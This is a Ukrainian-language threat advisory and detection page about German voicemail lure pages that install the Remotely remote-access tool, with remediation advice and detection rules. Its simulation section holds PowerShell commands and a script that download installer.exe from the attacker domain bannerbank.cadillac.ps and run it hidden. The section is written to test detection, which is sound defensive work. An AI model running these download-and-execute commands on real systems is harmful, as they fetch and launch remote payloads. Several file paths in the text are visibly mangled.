Голосова пастка: Німецькомовне голосове заваблення веде до віддаленого доступу
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники розміщують веб-сторінки «голосової пошти» німецькою мовою, які спонукають користувачів завантажити BAT-файл. Сценарій відтворює нешкідливу аудіо-приманку, одночасно тихо встановлюючи легітимний інструмент віддаленого моніторингу Remotely. Після розгортання агент RMM надає зловмиснику стійкий віддалений доступ через інфраструктуру C2, контрольовану зловмисником.
Розслідування
Censys ідентифікував 86 скомпрометованих веб-ресурсів на доменах *.cadillac.ps, які поширюють шкідливий BAT. Сценарій викликає інсталятор PowerShell, розміщений на remotely.billbutterworth.com, який завантажує ZIP-пакет Remotely. Архів містить компоненти агента Remotely та сервіс, що встановлюється у C:Program FilesRemotely.
Усунення
Заблокуйте домени *.cadillac.ps і remotely.billbutterworth.com на рівні DNS/проксі. Навчайте користувачів не запускати неочікувані BAT-файли або не копіювати/вставляти команди PowerShell з невідомих веб-сторінок. Впровадьте контролі на кінцевих точках для виявлення створення сервісу Remotely, підозрілих шляхів встановлення або не підписаних інструментів.
Реагування
Оповістіть про створення Remotely_Service і присутність Remotely_Agent.exe в Program Files. Відстежуйте діяльність voicemail.bat та пов’язаний із ним інсталятор PowerShell. Ізолюйте заражені хости, зберіть артефакти судової експертизи та змініть/відкличте будь-які облікові дані або токени, використані агентом RMM.
Потік Атаки
Виявлення
Завантаження чи Завантаження через Powershell (через командний рядок)
Перегляд
Підозріле зупинення сервісу, яке перешкоджає дії зловмисного програмного забезпечення (через командний рядок)
Перегляд
PowerShell виконує файл у підозрілій папці з використанням політики обходу виконання (через командний рядок)
Перегляд
Індикатори компрометації (HashSha256) для виявлення: Пастка голосової пошти: Німецькомовна приманка голосової пошти призводить до віддаленого доступу
Перегляд
Індикатори компрометації (HashMd5) для виявлення: Пастка голосової пошти: Німецькомовна приманка голосової пошти призводить до віддаленого доступу
Перегляд
Німецька приманка голосової пошти, що веде до встановлення RMM [Веб-сервер]
Перегляд
Виявлення виконання файлу голосової пошти BAT [Подія файлу Windows]
Перегляд
Імітаційне виконання
Передумова: Попередня перевірка телеметрії та основи повинна була пройти.
Обґрунтування: Цей розділ детально описує точне виконання техніки нападника (TTP), розробленої для запуску правила виявлення. Команди та розповідь МАЮТЬ безпосередньо відображати ідентифіковані TTP та прагнути створити точну телеметрію, очікувану логікою виявлення. Або абстрактні приклади, або не пов’язані приклади призведуть до хибних діагнозів.
-
Розповідь про атаку та команди:
- Доставка фішингу: Атакуючий надсилає електронний лист із вкладенням-приманкою голосової пошти (HTML) німецькою мовою, яке при відкритті перенаправляє жертву на
http://bannerbank.cadillac.ps/voicemail.html. - Виконання на посадковій сторінці: На посадковій сторінці розміщено шкідливий однорядковий PowerShell, який завантажує та виконує інсталятор інструмента віддаленого управління (RMM).
- Створення процесів: Коли браузер жертви обробляє сторінку, PowerShell викликається з командним рядком, який явно включає два рядки, на які дивиться правило.
- Результуюча телеметрія: Windows реєструє подію ID 4688 з
CommandLineщо містить обидва «посадкова сторінка з голосовою поштою» and «bannerbank.cadillac.ps», таким чином, задовольняючи умовам Sigma.
Точна команда, використана для імітації:
# Імітоване шкідливе виконання – містить обидва тригерних рядки Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"Write-Host 'посадкова сторінка з голосовою поштою'; Invoke-WebRequest -Uri 'http://bannerbank.cadillac.ps/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe`" - Доставка фішингу: Атакуючий надсилає електронний лист із вкладенням-приманкою голосової пошти (HTML) німецькою мовою, яке при відкритті перенаправляє жертву на
-
Скрипт регресійного тестування: Самодостатній PowerShell-скрипт, що відтворює атаку і може бути виконаний на будь-якому хості Windows з увімкненим необхідним логуванням.
<# .SYNOPSIS Імітує німецькомовну приманку голосової пошти, яка запускає правило виявлення Sigma. .DESCRIPTION Виконує командний рядок PowerShell, що містить обидва необхідні підрядки. #> # Define malicious strings $lureText = "посадкова сторінка з голосовою поштою" $maliciousDomain = "bannerbank.cadillac.ps" # Побудуйте однорядковий рядок, який з'явиться в командному рядку $payload = @" Write-Host '$lureText'; Invoke-WebRequest -Uri 'http://$maliciousDomain/installer.exe' -OutFile $env:TEMPinstaller.exe; Start-Process $env:TEMPinstaller.exe "@ # Запустіть PowerShell з підготовленим командним рядком $psArgs = "-NoProfile -WindowStyle Hidden -Command `"$payload`"" Write-Host "Запуск шкідливої команди PowerShell..." Start-Process -FilePath "powershell.exe" -ArgumentList $psArgs -PassThru # Optional: wait a few seconds to ensure logging Start-Sleep -Seconds 5 -
Команди очищення: Видаліть завантажені інсталятори та будь-які залишкові процеси.
# Зупиніть будь-який залишковий процес інсталятора Get-Process -Name "installer" -ErrorAction SilentlyContinue | Stop-Process -Force # Видаліть тимчасовий файл інсталятора $installerPath = "$env:TEMPinstaller.exe" if (Test-Path $installerPath) { Remove-Item $installerPath -Force Write-Host "Очищено $installerPath" }